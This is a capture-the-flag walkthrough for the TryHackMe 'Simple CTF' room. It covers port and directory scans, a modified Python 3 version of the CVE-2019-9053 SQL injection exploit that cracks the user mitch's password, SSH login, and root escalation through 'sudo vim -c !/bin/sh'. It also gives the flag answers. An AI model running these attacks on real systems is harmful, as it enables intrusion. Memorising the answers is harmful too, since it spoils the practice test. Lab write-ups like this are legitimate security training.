Simple CTF

https://tryhackme.com/room/easyctf

Task 1: Simple CTF

How many services are running under port 1000?

Let's scan the target using nmap.

$ nmap -sC -sV 10.10.48.90 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-07 22:29 IST
Nmap scan report for 10.10.48.90
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.48.138
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.85 seconds

There are three open ports:

PortService

21

ftp

80

http

2222

ssh

Out of the three, only two are below 1000.

Answer

2

What is running on the higher port?

The highest port is 2222 which has SSH running on it.

Answer

ssh

What's the CVE you're using against the application?

We can use gobuster to brute force the web pages.

$ gobuster dir -u http://10.10.48.90 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.48.90
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/.hta                 (Status: 403) [Size: 290]
/index.html           (Status: 200) [Size: 11321]
/robots.txt           (Status: 200) [Size: 929]
/server-status        (Status: 403) [Size: 299]
/simple               (Status: 301) [Size: 311] [--> http://10.10.48.90/simple/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Let's visit the /simple page.

On the web page, in the footer section we can find the version of the CMS.

Let's check Exploit-DB to see if there is an exploit for that version.

Answer

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

The vulnerability is mentions in the CVE page.

Answer

SQLi

What's the password?

Let's save the exploit to a file called exploit.py.

If you don't have termcolor, you can use the following command:

pip install termcolor

We will have to modify the exploit a bit for Python3.

exploit.py
    if not options.url:
--      print "[+] Specify an url target"
++      print("[+] Specify an url target")
--      print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
++      print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
--      print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
++      print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
--      print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
++      print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
    
    def crack_password():
--      dict = open(wordlist)
++      dict = open(wordlist, encoding='utf-8', errors='ignore')
    
    def beautify_print_try(value):
--      print "\033c"
++      print("\033c")
    
    
    def beautify_print():
--      print "\033c"
++      print("\033c")
        
    
    if options.cracking:
--      print colored "[*] Now try to crack password"
++      print colored("[*] Now try to crack password")
$ python exploit.py -u http://10.10.48.90/simple --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 1dac0d92e9f2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Pasword cracked: secret

Answer

secret

Where can you login with the details obtained?

Let's try and login through SSH using the mitch username and secret password.

$ ssh mitch@10.10.48.90 -p 2222
The authenticity of host '[10.10.48.90]:2222 ([10.10.48.90]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.48.90]:2222' (ED25519) to the list of known hosts.
mitch@10.10.48.90's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ 

Note that we had to specify port 2222 because that is the port SSH was running on in this machine.

Answer

ssh

What's the user flag?

We can stabilize the shell using the following commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
export TERM=xterm

Let's read the user flag.

mitch@Machine:~$ cat user.txt 
G00d j0b, keep up!

Answer

G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

Let's check for other users.

mitch@Machine:~$ ls /home/
mitch  sunbath

Answer

sunbath

What can you leverage to spawn a privileged shell?

  • We can check the files that mitch can execute using the following command:

mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Answer

vim

What's the root flag?

We can find an exploit on GTFOBins.

Let's run the exploit.

mitch@Machine:~$ sudo /usr/bin/vim -c '!/bin/sh'

#

We can now read the root flag.

# cat /root/root.txt
Well d0n3. You made it!

Answer

Well d0n3. You made it!

Last updated